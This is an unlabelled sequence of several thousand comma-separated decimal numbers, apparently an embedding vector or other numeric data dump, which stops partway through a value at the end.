-0.0064573702,-0.017721161,0.015527288,-0.0323072,0.008333523,0.0015872726,0.0025709427,0.0049814368,-0.008301727,0.009370462,0.009996342,-0.011598818,0.020812584,0.012598418,-0.0008366474,-0.019973494,-0.0016147146,0.013423506,-0.0046248925,-0.010477221,-0.011885011,0.012403963,-0.0014421988,0.011778765,-0.00067456666,-0.00803891,-0.006454898,0.010811049,-0.0045069708,0.002922947,-0.0052202786,0.008815625,0.010389417,-0.012572179,-0.012685593,-0.004824557,-0.015933897,-0.0016316132,-0.0074064154,0.009301196,-0.01217564,0.010188945,0.012474642,0.01843079,0.019955277,-0.0030647402,0.009939807,-0.0014498762,0.009450341,0.013448801,0.0020067326,0.0028008728,0.014113764,0.008393742,-0.015848529,-0.015350955,-0.014101492,-0.010638214,0.0024218457,-0.0015271541,0.004528519,0.0055346037,0.003756705,0.00048784594,0.0074590384,0.0048297313,-0.011234961,0.0041768975,0.011166901,0.010304665,-0.008399624,0.010933144,0.00729591,0.01796477,0.0035999846,-0.008796906,0.015759815,0.016736828,-0.02810374,-0.01727034,-0.0006345165,0.00055208127,0.021137523,-0.0073227584,0.00026125327,-0.0017406734,0.017345523,0.015175995,0.014613404,0.0023676797,0.01014996,-0.006987539,0.0019965842,-0.008939322,-0.008423119,0.002751702,-0.006527918,-0.02615153,0.15487215,-0.025377713,-0.02623568,-0.0061669596,-0.002798278,0.012605858,-0.006746853,-0.007400131,-0.020581782,-0.028409041,0.00063006784,0.014638194,-0.00019090068,0.013201659,-0.016515782,0.017574457,0.011000298,0.015053405,-0.04540097,0.017566837,0.020930532,-0.02582,0.0047439393,0.005141367,0.005627305,-0.0058021597,-0.01909756,-0.0055159517,-0.0040475396,0.026023539,-0.005837555,0.008733066,-0.020472981,0.011566376,0.020715307,-0.016650546,-0.0071261553,-0.0066350703,-0.03161997,0.014425455,0.008968142,-0.009486033,0.0003245215,-0.0064181252,0.011307419,0.016543822,0.029361948,-0.0004611813,-0.009922908,0.019065015,0.008640415,0.0030721168,-0.017404556,0.003511036,0.006917389,0.006668334,-0.0100890845,0.002564578,-0.014507025,0.0060589174,0.024283474,0.0035687194,0.00030814888,0.0055992436,0.018388486,-0.0071581113,0.017755564,0.013819502,0.017858244,0.021279436,-0.03804472,-0.012446456,-0.0057139467,-0.02850554,-0.0063731526,-0.0013893407,-0.024447467,0.0088564325,-0.0094142845,0.04104222,0.0029271413,-0.0030969414,0.002057345,-0.0043813772,-0.018792484,-0.00759355,-0.019436525,-0.012807361,-0.005852816,-0.0018971029,-0.015211196,0.017038692,-0.0074833333,-0.010361983,-0.011557792,0.0057354188,-0.007717552,-0.0030206114,-0.014268753,-0.0272468,0.010144376,0.0014467854,-0.0123598715,-0.0013901304,-0.019350225,0.025859853,-0.006565379,-0.0055161975,-0.0016730622,-0.0015445962,0.04272026,0.011093239,0.023480203,-0.005070001,-0.0099903075,0.0049062367,0.004445866,0.024639344,0.009244752,0.013834705,-0.0086323125,0.008501001,0.015551356,0.0066938414,0.0043059792,-0.0032692624,-0.010253821,-0.005480036,-0.0023035277,0.03681813,-0.0021285038,-0.004252609,0.019903857,-0.0004901167,-0.0026457412,0.011091085,0.0148261,-0.009628239,0.01226797,-0.010058302,-0.0006458591,-0.00042991975,0.01953537,-0.0036548942,-0.019742845,-0.003110288,-0.0028082328,-0.0041235103,-0.014613534,0.0058469926,-0.018154105,0.0145229455,0.0014680462,0.012335695,-0.0083123,-0.026064087,0.017009623,0.0026007185,0.018484116,-0.009834619,-0.015778154,0.0042462666,-0.009399804,0.022797635,0.0076734927,0.013283455,-0.023537304,0.098627,0.007415597,-0.011201305,0.020858305,-0.042678524,-0.004284223,0.026459986,0.0074168076,0.0027701624,-0.0109686805,-0.0139089795,-0.015102433,-0.0051614824,0.0022784278,0.008366549,0.012543967,-0.020782322,0.008759345,-0.029300615,-0.012495463,0.0159004,-0.0016598777,-0.029807156,0.019274922,0.0059403847,-0.0062261703,-0.0017531578,0.0013505786,0.012423662,-0.005342789,-0.0031053247,-0.006973947,-0.016446246,0.0010736847,-0.014663638,0.004776705,-0.015466937,-0.0042392523,-0.016168902,-0.023726037,0.0074794423,0.010370216,-0.008167155,-0.015255956,-0.013540733,0.009600767,0.025298337,-0.0048647453,-0.016680427,0.0017125867,0.013497527,0.025092138,-0.017279515,0.020065598,-0.019835185,0.0076856194,0.013110674,-0.026783912,-0.0049923896,0.014923407,0.022802684,0.0056529166,-0.013038116,0.030170942,-0.0016546943,0.02601905,0.0070169913,-0.008205845,-0.0068331095,-0.007980266,-0.01271067,0.020984074,0.014182427,0.013212935,-0.021379901,-0.00012509161,0.001113523,0.0003923905,-0.019850776,-0.025851477,0.0030027535,0.024441453,0.002756499,-0.009106169,-0.01680009,0.0059878514,-0.00006610377,0.025629342,0.00439326,-0.017967818,0.026218228,0.012763356,0.009790669,-0.017791256,0.006693777,-0.014785793,0.016186811,-0.012172549,-0.008050379,-0.00463977,-0.019202445,-0.0096300505,-0.006489776,0.002671528,0.004835521,-0.009230821,-0.0039390246,-0.007006439,0.005044483,0.030376425,-0.008945503,0.014685995,-0.0035295305,0.0012389913,0.02466265,-0.015132276,0.019548424,-0.0014404441,-0.0038439182,0.0014578832,0.0155508425,0.016833553,0.019590678,0.016784096,-0.012404158,0.0108629335,0.0035610066,0.0054233638,-0.00775106,0.019430134,0.022980615,0.0011394351,-0.009910331,-0.028594991,-0.008088488,-0.013303911,0.027489157,-0.040020578,0.012884273,-0.008633797,0.004016633,0.006600278,0.029329209,0.015025601,-0.021118848,0.007689417,0.023006056,0.005135853,0.010845063,-0.014390024,-0.0064586652,0.003930262,-0.016394064,-0.011515623,0.0012497765,0.009810872,-0.012996916,-0.017271072,-0.013551454,0.0010295801,0.03663015,-0.012617457,0.017428705,-0.008779729,-0.029895205,-0.002065329,-0.0037332408,0.090154134,-0.01773324,-0.014539284,0.005340851,-0.006336408,-0.012767898,0.013585268,-0.00048772746,-0.016063984,0.00075207226,0.017964449,-0.0015767822,0.011579576,0.03129364,-0.016629796,-0.019134535,0.026870247,-0.005467024,0.0018956764,0.012421193,-0.0004949042,0.0035849325,-0.008121128,-0.021778693,-0.024444401,0.012368123,0.0049599656,-0.014582318,0.0113097485,-0.00002140103,-0.005663618,0.012408179,-0.0006762396,-0.012072109,0.033442665,0.010285506,-0.002977547,0.011273202,-0.00990792,0.011212375,0.016904294,-0.010442299,0.025951514,0.015835008,0.0026975062,-0.010119839,-0.009990084,0.018227683,-0.01995986,-0.0034561178,-0.0043507926,0.017877575,0.023693137,-0.003802888,-0.006014764,-0.01369901,0.010233326,0.018799225,0.00087636954,0.010517586,-0.0054985126,0.00076568185,-0.0057494384,-0.007081829,0.0005546779,0.022826836,-0.00034396644,0.011268398,-0.0072663557,-0.0054633524,0.006360747,-0.002404602,0.008058382,-0.017415207,0.01632113,0.008043513,0.0102903405,0.018361825,0.019622792,0.0050661867,-0.001189637,0.011506345,-0.016541166,-0.012003734,0.0127985515,0.014659841,-0.010084721,0.029998148,-0.015944049,-0.016456528,0.0116910525,-0.0060672606,0.01817093,-0.003999972,-0.01215456,0.011207255,-0.0129786655,-0.011966815,0.0024057138,-0.0017667561,-0.009321422,-0.024856668,-0.02569522,0.010574878,-0.0006140069,-0.0013407505,0.0023234738,0.015454379,0.016750524,0.0026149242,0.00093447225,-0.043022003,0.0031099836,0.021653268,0.017761188,-0.017221887,0.03976235,-0.007077753,-0.00051821524,0.0022359993,0.0077620563,0.0049204696,0.009731841,-0.0085789915,-0.003782981,0.017801624,0.013743087,0.003660018,-0.01948681,0.001398552,-0.050850086,0.014665049,0.030102966,0.006029594,0.00089767395,-0.005601258,0.004169384,0.0026293758,-0.010475517,0.0012800102,-0.0019629989,0.005516887,0.009888045,0.016908886,0.027711991,-0.01038663,-0.0053289286,-0.012709464,0.024597572,0.008882328,-0.00930861,-0.003747116,-0.0011020246,-0.015260987,-0.013160183,-0.009526025,0.013674005,-0.008814813,-0.0037068948,-0.011257183,0.038480345,-0.000009975004,-0.00063591625,-0.0129319895,0.0113772405,0.0048429486,0.022652034,-0.016895816,0.020335145,0.0035930236,-0.018785547,-0.010252137,-0.00088142254,-0.0073027997,-0.0006073178,-0.00055145635,-0.0008110632,0.010580815,-0.007060929,0.005392614,0.030569332,-0.009807378,0.038725536,0.023268761,0.014789775,0.0014729908,-0.009525477,-0.0061737373,0.0006158083,0.014719764,-0.007971656,-0.005486268,-0.019644,0.0005433809,0.02224342,0.0028658686,-0.022044415,-0.008540634,-0.01217904,-0.0028741958,-0.021561282,-0.014958863,-0.01776211,-0.036939774,0.0030178702,0.006103106,0.016000718,-0.013331258,-0.03488407,-0.018858109,0.006568976,0.034912203,-0.027943987,0.01228713,-0.0049500666,-0.008938364,-0.017896274,-0.019815724,-0.014191265,-0.006506807,0.031465918,0.00014532385,0.030858893,-0.0014844806,-0.0101485355,0.034193356,0.018379299,-0.0036970247,-0.006581775,-0.0011591589,-0.019424846,0.009015045,0.019045712,-0.012269194,-0.030271322,-0.0047070505,0.0062272605,-0.0051204846,-0.013028219,0.00902204,0.018126374,0.016676273,-0.019148007,0.021253282,-0.0027361354,-0.027725896,-0.011650871,0.014628191,-0.011591489,-0.013306495,0.004295938,0.0052323025,-0.027748525,0.0048652664,-0.016943684,0.007942313,0.017426549,0.0023293332,0.018753588,0.011707408,-0.007835041,-0.0067039113,0.020786721,-0.018665465,0.00074382126,-0.033102542,0.013437245,0.0013077987,0.0069505153,0.0018238868,-0.0005332028,-0.012770435,-0.008521388,-8.55112e-7,-0.0109959245,-0.009445468,-0.005796123,-0.036843352,0.013560095,0.004555258,0.0113358265,0.0025049343,0.015502264,0.0071683135,0.002713271,-0.015385986,-0.019214517,-0.050913893,0.0020425338,-0.010684919,-0.004215977,-0.01953144,-0.025692344,-0.03474096,0.016167896,-0.005413574,0.013220568,0.007405005,-0.0035216294,0.0037749643,-0.014162469,-0.00601666,0.007928903,0.012719916,-0.02559838,0.0035260024,0.014918031,-0.0018468801,0.0020358646,0.00408812,-0.014637418,0.04143153,-0.010624741,-0.006300385,0.011527482,0.012868281,-0.0037181159,0.009619385,0.0120654125,-0.0050782645,0.0036341147,0.0013191949,0.006844254,0.027911628,0.00618029,0.017375149,0.015221763,0.0024448263,-0.009284682,-0.014771598,0.008336485,-0.015320171,-0.010884784,0.03039182,0.005615375,-0.006873492,0.0066659865,0.001608664,0.026937937,0.00550558,0.0067526074,-0.004544002,0.012731384,-0.025052628,-0.0058640703,0.0039700456,-0.017232962,0.00052650063,-0.0075698537,-0.013161322,0.010903623,0.00980286,0.014996467,0.00507325,0.0051099937,0.013864094,0.00445116,-0.006236418,-0.021287423,-0.01390914,-0.019677926,0.015687663,-0.024736354,-0.015309538,0.010755858,-0.00087562995,0.031995572,-0.012271873,0.009869772,-0.0131422635,-0.016441524,0.012952701,-0.00090883585,-0.00021598591,0.0022498344,0.019610452,0.029676758,0.0044337707,-0.010099224,0.004004378,0.028152708,0.0023433242,0.02750164,-0.0007200043,0.016914995,-0.013635219,0.019233404,0.0116094155,-0.0046594744,0.01772038,-0.009819662,0.01065123,0.005932031,0.034485072,-0.0053217346,0.0021326514,-0.0006175964,0.01407343,0.036702454,0.018456347,0.006424169,-0.027250309,-0.011336462,0.0036603694,-0.022422323,0.005275825,-0.0020004557,-0.063830055,0.023482094,0.016059617,0.008322672,0.012107555,0.018925522,0.013933344,-0.0063689174,0.022442315,-0.010217729,0.0059468113,-0.012467021,-0.0060419333,-0.008616153,0.0062687155,-0.014832825,-0.030925494,0.008092186,0.02816353,-0.0037402485,-0.004392729,0.004310171,-0.0106184445,0.0023850088,0.021874653,-0.015050246,0.006482355,-0.0017511551,-0.00739919,0.021377964,0.018926604,-0.00035871597,-0.00023071562,-0.0025799992,0.009954538,-0.014280451,0.013893624,0.011261359,-0.02211864,0.011517164,-0.0028424414,0.0050040204,-0.004938418,0.027095398,-0.004613714,-0.00008357898,-0.006549293,-0.020082908,0.0018634178,-0.044020835,0.025604207,-0.011691451,-0.027302114,0.007828304,-0.026615117,0.0013673631,-0.0019475392,0.010448473,0.00828085,-0.007410206,0.0035491288,0.011690744,0.011085273,0.031065175,-0.015706494,-0.004768938,-0.00035708418,0.014769063,0.005686547,-0.0170435,-0.017334465,-0.004308621,0.010939249,0.0071816137,-0.0032281375,0.031528823,-0.005305531,-0.008342961,-0.002142407,-0.0058552055,-0.007494207,-0.009004519,-0.008481753,-0.009043606,-0.039212544,0.01195483,0.00586986,0.008395123,0.012655114,-0.016540563,0.0050156866,-0.0065338444,-0.005775816,0.013664891,0.012506935,0.022124957,-0.012651857,0.01472587,0.01241394,-0.0026541946,0.026749045,-0.014676406,-0.026804404,0.03330798,0.008481216,0.00093941635,-0.001278737,-0.02554676,0.01238506,0.01885024,-0.0015537455,-0.022182789,0.0062372037,-0.0039354768,0.012594049,0.0011956246,-0.0072859563,0.027268648,0.010771094,0.00048612064,0.019044405,-0.006972059,-0.0135228755,-0.0047361683,0.016446013,-0.00094797974,0.0032577005,0.0073934244,-0.005242449,-0.0056425086,0.00940557,-0.029550593,-0.019967493,-0.015454019,0.019304737,-0.009185867,0.0010024519,-0.0027789602,-0.007299935,0.00014605594,0.0008680341,-0.014916939,-0.027494196,0.022223989,-0.0026298673,-0.011369457,0.0037879683,0.0043836227,0.0142051615,0.022029439,0.0032927697,-0.012497802,-0.009867555,-0.008481472,-0.013600293,0.028239321,0.007200945,-0.019443752,-0.0031642206,0.017772136,-0.02996331,-0.018009769,-0.012104635,-0.009150044,-0.035019517,-0.009085726,-0.018435722,-0.021874651,-0.0075119557,-0.009016411,0.015092601,0.006588032,-0.0067672706,0.002834729,0.013219524,0.00080834195,0.0128048975,-0.020486152,-0.02785165,0.016282802,0.017559918,0.024659133,0.013751156,-0.010484822,0.015495573,-0.034868177,0.002598654,0.012084719,-0.0159454,-0.008671531,-0.022832727,0.002556208,-0.003949513,0.024369614,-0.0081155775,-0.008867176,-0.009915999,0.029645672,0.005580416,0.009682062,-0.015479606,0.027695362,0.0039820867,-0.0061989333,-0.012234174,0.021179518,0.018357538,-0.025601458,0.0017603287,-0.01420502,-0.00039859247,0.009844381,-0.015008501,0.022578217,-0.019514868,-0.011240684,-0.016780801,-9.0169755e-7,0.012306238,-0.033488303,0.002005632,0.016485058,-0.001330952,-0.015954386,-0.0066602672,-0.013658545,0.017756937,-0.0029645027,0.0035772019,0.013380938,0.016344354,-0.023125742,0.0021769698,-0.0040746895,-0.01964037,0.004552895,-0.0028197053,-0.002213929,-0.007340273,-0.025931293,0.00859239,0.007937838,0.0018512986,0.0018021566,0.01727044,0.021120014,-0.0056645274,-0.0019420121,0.026518894,0.012220446,0.0022103123,0.00876825,0.012448902,0.0033378755,-0.01194346,-0.00708973,-0.015132752,-0.0014932606,-0.01183249,0.0009933756,0.013549392,-0.006256786,0.006893631,-0.0013558533,0.014465984,-0.019676706,-0.0013021006,0.004166616,0.005804634,-0.008228533,-0.0048410553,-0.016899845,0.0065776804,0.012087471,-0.005168476,-0.011566714,-0.0105722435,0.0028523754,0.005868462,0.01117631,0.005710883,0.0035597056,0.013872505,-0.038793545,0.005755143,0.016268205,-0.0073353895,-0.02166595,0.005205301,-0.008359703,-0.0032610411,-0.016262213,-0.0029953583,-0.0039766254,0.0127601335,-0.009478079,-0.0010820242,0.0021760003,0.008461131,-0.010230177,0.076763354,-0.000026036987,0.004187985,-0.006313881,0.018985212,-0.0115771955,0.0121795805,0.0008350533,-0.0076692454,-0.0013158435,-0.010328491,-0.008257865,0.020664373,-0.03315864,-0.017606879,-0.0002734009,0.009689758,0.027403839,0.0033338652,0.009783515,0.005589577,-0.0020336888,-0.0065769437,0.009303219,-0.0066267042,0.02567116,0.005557916,-0.0004514925,-0.010964023,0.0013361046,0.0057674125,-0.007343138,-0.0057970528,0.010752047,0.022931134,0.01334398,0.0019371003,-0.033615544,-0.007982964,0.014837839,-0.018912783,-0.010085379,0.06656019,0.009999474,-0.010266109,-0.0075089764,-0.008029039,0.01095221,0.000712523,-0.017841011,0.017039629,0.012206523,-0.0004382822,0.014563826,0.018369894,0.01855848,-0.023687318,0.02639107,-0.00043541766,0.002194059,0.02348909,0.00032354088,-0.018961845,0.0009412435,-0.026021877,0.0026109198,0.010766066,-0.009346113,0.0024906925,0.000071774186,-0.0231809,0.02158742,-0.0134102665,-0.0051482515,0.005781209,0.004847671,0.016241001,-0.012573358,0.0102422545,0.028261036,-0.013208893,-0.021904813,0.021486262,-0.017145982,0.004451727,-0.020174596,-0.00088178617,-0.012245605,0.09169059,0.020737063,0.03576589,-0.030821698,0.005891083,-0.0017903079,0.015554216,0.020911798,0.017014226,-0.009254543,0.0056080692,0.028469931,0.0101482,0.01050988,-0.006687314,-0.0027174836,0.009008821,0.0053829798,0.0100239795,-0.013377756,0.000833115,0.008257693,-0.008083478,-0.01821896,-0.023765173,0.014167135,-0.021656273,-0.010254355,0.013732251,0.003768407,0.0040755216,0.009731581,0.012918085,0.01979954,0.008198703,-0.0637163,-0.007302586,0.2503471,-0.0038679016,0.009517019,0.0028039564,-0.0057156375,-0.012979688,-0.09833465,-0.01194808,0.018325344,0.024847582,-0.026490925,-0.0051144944,0.0011579107,0.016589675,0.009868071,0.022272546,0.008869333,-0.026611704,0.006365023,-0.012852742,0.01725792,-0.00061693863,0.03219262,0.0017379205,-0.008010414,-0.0011550769,0.010649972,0.005689155,-0.029146044,0.011973848,0.0064380136,0.0065347417,0.002913351,0.0021246437,-0.002065852,0.0043728505,0.011815706,0.010453764,-0.014365561,-0.0066174027,-0.0018577385,-0.015973493,-0.012381578,-0.00859334,-0.17987043,0.0046229344,0.028323548,-0.017564422,0.033696115,0.0009234091,0.012968182,0.018357147,0.016169425,0.0045726984,-0.008526624,0.0021812588,0.015316457,-0.001064327,0.0014934413,-0.010912756,-0.009030846,-0.01618134,0.014980265,-0.0048475643,0.0024658728,0.012785518,-0.013534678,-0.005353469,0.023868648,-0.004431886,-0.013567852,0.010005151,-0.015979527,0.014942745,-0.021717163,0.009388834,-0.009885851,-0.00952169,-0.010557486,-0.011583014,-0.025683038,0.018276071,-0.019339075,-0.00535706,0.00047897492,0.0017941328,0.0032034894,-0.008546851,-0.0036856954,0.01574965,0.017920233,-0.0010671839,-0.004885875,-0.0032191228,0.014429722,-0.0069928765,-0.028094161,0.004625514,-0.0103682,-0.0047593047,-0.0107646985,-0.001140482,-0.018054914,0.0024309133,-0.0039568758,-0.019366037,-0.035326667,-0.020651935,0.036339,-0.04520603,-0.0031299766,-0.022698814,0.0055613616,0.001664807,-0.001071848,0.014425482,0.006899225,-0.0056445757,0.012901891,0.015187193,-0.015185287,-0.002537635,0.007299939,-0.0028348363,0.0014308208,-0.00175061,0.002036133,-0.008626377,-0.01123085,0.000010128986,0.0137693435,-0.0049060606,-0.01999512,0.0035963864,-0.01475263,0.018451035,0.03052191,0.002720637,-0.014305588,0.0025183212,-0.0010037539,0.008732875,-0.0013732027,0.026912298,0.0019161315,0.024798876,-0.012739008,0.004910989,-0.019983236,0.020666538,-0.003078631,-0.00376019,-0.010948045,-0.009708768,-0.011692625,-0.0035351247,-0.0018223297,-0.027942616,-0.03337711,-0.021755511,0.019261423,0.0071748532,0.008892054,0.00285556,-0.030311938,-0.023101337,-0.018062236,-0.0014818766,0.030090475,-0.011251325,-0.027497884,-0.0076044146,-0.0064349617,-0.01459926,-0.011085765,0.0026405957,-0.0022372263,0.008839762,0.0036902928,-0.0008825062,-0.0018728322,-0.006342102,-0.0005145903,0.020676227,0.004383967,0.004395458,-0.013362078,0.0071621346,0.016272863,-0.011521214,0.02452555,0.0048187347,0.013420015,-0.008387877,0.009508065,0.02912575,0.009317155,-0.0106528,-0.019844193,0.083225474,0.0029162306,-0.01494826,0.0023415876,-0.008127632,0.00886175,0.011969625,-0.016138969,-0.029311514,-0.024947135,-0.01596443,0.014282541,-0.008237782,0.013547966,-0.022024015,0.017164996,0.020290177,0.01679673,-0.01613731,0.0010791373,0.01563839,-0.017092546,-0.009632325,0.029887415,0.0079885945,-0.009617407,0.00015912818,-0.012873006,-0.010350803,-0.001881006,-0.018909937,-0.0011947692,0.0090958355,-0.012304426,0.013586421,-0.042750217,-0.0073241643,-0.020693587,0.018672744,0.0072798273,0.017634958,0.020897806,0.00091025844,-0.01697492,0.015265345,0.018176366,0.01327757,0.012997816,-0.00033500537,-0.01051193,0.0023587039,0.0065015596,-0.0030293283,-0.017723802,-0.0058527375,-0.02843611,0.00630533,0.0003477198,-0.0092134895,0.008031592,0.047504753,-0.024694765,-0.0041821767,-0.0070257382,-0.019396588,0.011832205,0.001009799,0.009401325,0.01413772,0.038303982,-0.0076552043,-0.007925518,0.00649691,0.0082291765,-0.0037776907,-0.00020800269,-0.008876451,0.0073934034,-0.014450705,0.0103041055,0.018860577,0.01976472,-0.024556993,0.0038927519,-0.017149646,-0.048695818,-0.0078618545,-0.004522449,-0.04023206,0.020691028,-0.0012053642,0.0041643884,0.004105155,0.015127507,0.024000566,-0.011238003,0.0011705097,-0.0027812608,0.0016805866,-0.005604227,-0.00020519111,0.010942636,-0.012662966,-0.023339517,-0.016429098,0.00057791476,0.007597486,-0.020443074,0.01705248,-0.002849868,0.017372191,-0.0007534224,0.021712981,0.006410059,0.011431662,0.048751716,-0.02157641,-0.0036895587,0.002246006,-0.009648143,0.0045478116,0.0017567192,-0.0046467986,-0.014480906,0.006295814,0.0094015375,-0.005318921,0.029340727,-0.0205496,0.011013808,-0.0035809882,0.013274356,-0.013977632,0.009660507,0.007553649,-0.02104785,0.019674163,0.001040292,-0.0009040149,0.0048375498,-0.0068288674,0.014792383,-0.00684441,-0.01382791,-0.0053261234,0.002973344,0.0030606745,0.0076383417,-0.0127584,0.013379272,-0.012495468,-0.01004535,-0.0014225541,-0.0024026264,-0.005163201,0.00093077566,-0.014182707,0.0065873764,0.0013270322,-0.00408752,-0.021538349,0.03743701,-0.010479322,-0.018536964,-0.012607115,0.024901357,0.025787044,-0.016995972,0.022248968,0.004941857,-0.01823095,-0.015842771,0.0014382,0.005990708,-0.011644162,0.01855469,0.013287011,-0.0036661546,-0.00085774396,0.011530836,0.03820345,0.00961993,-0.015516174,-0.00064299296,0.012504642,-0.021038417,-0.011723014,0.011512067,0.00882265,-0.008884327,-0.01093687,-0.005180527,0.0070213773,-0.015212203,-0.0041551217,0.018617813,0.010621482,-0.020714669,0.0009961934,0.018531376,-0.007379569,0.003930707,-0.013279749,-0.017121086,0.0038194554,0.01080107,0.0064381487,-0.020558411,-0.012046347,0.014329436,-0.005192484,-0.0055124164,-0.015738249,0.0035413133,0.0034942685,0.0012183279,0.015089851,0.018029325,-0.013692057,-0.024429962,-0.026617857,-0.0015886447,0.012017065,0.015755225,-0.049125295,0.013420832,0.00043575658,0.089075394,-0.0019642666,-0.0027224012,0.011219218,0.052007407,0.014955281,0.010834922,0.009074603,-0.017730353,-0.025346013,-0.021260973,-0.024228979,0.00010997767,-0.010418871,0.0014620125,0.0046789204,0.01805522,0.010806611,-0.003244244,-0.018304529,-0.008078186,0.0067452854,0.0141531415,0.005792369,-0.010080202,-0.043287084,-0.0041559096,-0.0023967747,-0.028429467,-0.0053671184,0.007366736,-0.0041980688,-0.016524652,-0.007914784,-0.011349326,-0.012307409,0.016245015,-0.0073916633,-0.027236119,0.00037306378,0.012704708,0.0035354819,-0.0002599113,-0.002957722,-0.023029787,-0.016710592,0.019509673,-0.0037274037,-0.012482816,0.009176133,-0.010731684,0.018016722,-0.016602969,-0.013865529,0.012908146,-0.0018351157,-0.0013387052,-0.0067916145,0.009554807,0.010109946,0.001246475,0.0013836843,0.0010397385,-0.015378422,0.0010678091,0.0043254313,-0.021581525,-0.02824384,0.015707768,0.018048739,-0.016124107,0.029473407,-0.0077669155,0.002054094,-0.015044253,-0.007968528,0.01744686,-0.009519815,0.0036097176,0.0102411285,-0.009870407,0.0040548164,-0.010090142,-0.0009564345,0.0051795095,-0.0063124443,-0.023486651,-0.02149464,0.007057067,-0.0040389285,0.008046666,-0.026417669,-0.008362297,-0.0039233556,0.007498392,-0.02182298,-0.01119831,-0.008694967,0.013386456,-0.037852086,0.006964758,0.012880956,0.013931636,-0.01779199,-0.010091224,0.0160309,-0.21119653,0.020883946,-0.02399683,-0.010419564,0.010675409,-0.007207327,0.016197637,0.05341601,0.003927754,-0.049040277,0.017634498,0.0238368,-0.0029814371,0.00693746,-0.005902482,0.03385134,-0.009912468,-0.0098411655,-0.013540662,-0.011575674,-0.006361955,0.018514961,0.018847153,-0.013438028,0.004496591,0.035484936,-0.016064174,-0.005633924,0.022356154,0.017207554,0.008004926,-0.01035201,-0.00056857814,0.0018527866,-0.00418431,0.0117665585,-0.013166694,0.016792256,0.011214362,0.009938335,-0.0053721066,0.016983623,0.012473456,-0.0075854766,0.019411206,-0.0034962015,0.010897445,-0.0007827145,0.0100846775,0.0002701363,0.0053971587,0.001914326,0.01885842,-0.0028840199,-0.015191061,-0.0222688,-0.007986485,0.018969828,0.023061095,-0.014245392,0.015209062,-0.0010709736,0.009114615,0.004662641,-0.0071992422,-0.016738258,0.009137967,-0.017043702,0.0015176737,-0.0148711065,0.0020186615,0.010590505,-0.0070547094,-0.0074467836,-0.011975659,0.0069010104,0.020383557,0.011457366,0.006182231,0.029019669,-0.013207279,0.010066031,0.0012181978,0.025272276,-0.0007660492,0.013191037,0.0023835327,0.013629184,-0.008287894,0.009878129,0.015283935,0.010049525,-0.013248631,-0.002967304,-0.015826717,-0.0014531492,-0.009729445,0.026846712,0.0018589272,-0.0020708563,-0.004294953,-0.0009969362,-0.015220909,-0.020627487,-0.16170007,-0.006440557,0.016961448,-0.004853121,0.001898264,-0.027877174,-0.014044525,-0.014696034,0.017167224,-0.01374443,-0.024360217,0.02571459,0.027977763,0.011772155,-0.007747308,-0.0034239257,-0.03564381,0.009563537,-0.0029831878,-0.0103641935,0.015576206,0.0008145251,-0.023231825,0.0013469021,-0.004994611,-0.008706569,0.009292894,0.017803188,0.025135523,-0.023225866,-0.0109032905,-0.006746042,-0.0058409777,0.015114362,-0.02814063,-0.018865399,0.016703812,-0.0025139253,-0.008594641,-0.004719572,0.023854049,-0.006348876,0.01853293,0.009182584,0.01331406,0.005487684,0.004541504,0.0049423273,0.017018251,-0.0038882513,-0.009420226,-0.0038676818,-0.00869513,0.017247098,0.0015889098,-0.009215466,-0.0020679887,0.00151763,0.009249329,-0.0054256595,-0.022108924,0.024139242,-0.009622759,0.013224582,-0.004960003,0.004080974,0.008815589,0.02903619,0.019113977,0.0002493933,-0.0047374405,0.020711942,0.019001193,0.004069282,0.025491092,-0.0020704789,0.002503853,0.027044317,-0.005192951,-0.0073750415,-0.029997094,-0.014583462,-0.027965818,0.003121208,0.0018359482,-0.01593752,-0.005146999,0.018796034,-0.0051502157,0.03436071,0.0016029088,0.027153034,-0.015574101,0.00040708296,0.0053893225,0.014475329,0.014676776,0.0043284036,-0.0043287147,0.0059387074,-0.01904079,-0.0023056103,-0.004697729,0.0071417917,-0.0079969345,0.0097752325,-0.0107766865,-0.010444052,0.0072275824,0.0029835454,0.023074051,0.012825152,-0.00009751522,0.0011151698,-0.006727218,0.0006781317,-0.007051083,-0.008285483,-0.018155165,0.01732733,0.008745922,0.019899294,-0.009492695,-0.012429953,-0.014402272,0.01410706,-0.014235111,0.027773306,0.018489644,-0.0017136206,-0.00045304114,0.0009901157,0.02109659,-0.02713625,-0.0024920972,0.0008726819,0.00432027,-0.030542554,0.015614254,-0.0033481137,0.0017470955,-0.010747151,-0.0007946657,0.014709746,-0.018221896,-0.032110877,0.007864787,0.010717628,-0.0069629373,0.0023053377,0.0018508674,-0.0029372268,0.014349679,0.003208711,-0.004944902,0.0027164598,-0.0038038911,0.0024141036,0.009699387,-0.013905581,0.012593121,0.009221484,0.01291866,-0.004853196,0.00090781675,0.003407113,0.0007102688,0.0048558596,0.007919443,-0.0026690932,0.009782345,-0.008395634,0.019062793,-0.0040986603,0.0041007167,0.036629464,-0.0034820423,0.040444274,-0.003433723,0.012630055,0.021053199,0.0055337274,-0.014188304,-0.0038085089,0.006410949,0.004782261,0.0018375446,0.0071879984,0.013537033,-0.028764494,0.020799987,-0.012461915,-0.007547854,-0.0005636192,-0.0074049137,0.0034286869,-0.004725477,-0.008187639,0.007540669,-0.021592073,-0.017139494,-0.0022868458,0.0022185578,0.0064586136,-0.014986367,-0.01587679,0.0071444223,0.015866317,0.019629965,-0.00008064487,-0.0124217495,-0.027550375,0.011399381,0.005768753,0.005606566,0.016527897,-0.01814974,0.001624859,-0.009371955,0.0009430955,0.0013608118,-0.013184569,0.02436597,-0.0032554814,0.002726661,0.035133388,0.01586981,0.023300933,0.0022840658,-0.00599202,0.017195085,0.009636526,0.00048889493,0.0027113527,-0.014403421,0.01301654,0.010707303,0.0027182298,-0.007267122,0.0011018697,0.006554283,0.0050851908,0.010659264,-0.008477619,-0.009079416,-0.0024855381,0.010444266,0.02311781,-0.0029877694,-0.009238985,0.004928343,-0.017996222,-0.0070603387,-0.0024442193,0.0033025004,0.0027244682,0.030737732,-0.0074507846,0.0062041315,-0.00046073846,-0.022898559,0.015927084,0.0017475259,0.014594896,-0.0047562784,-0.016815655,0.023195177,-0.016984018,-0.006010748,0.01691634,0.0063401232,0.0046263766,-0.004714116,0.0044331765,0.011809423,-0.006353932,-0.018817289,0.0021044652,-0.005494992,0.012382186,0.0066298777,0.010184327,-0.00652591,0.014275558,-0.0020116537,-0.0021179735,-0.030664291,0.013551108,-0.0015644337,-0.016028816,0.011768877,0.001517836,-0.037600454,-0.025145544,-0.010091465,0.011453464,0.038013287,-0.004068102,-0.010626313,0.0001294529,0.005814457,-0.013532251,0.009442206,0.0060977596,-0.034443066,0.0055215876,-0.011637009,0.00712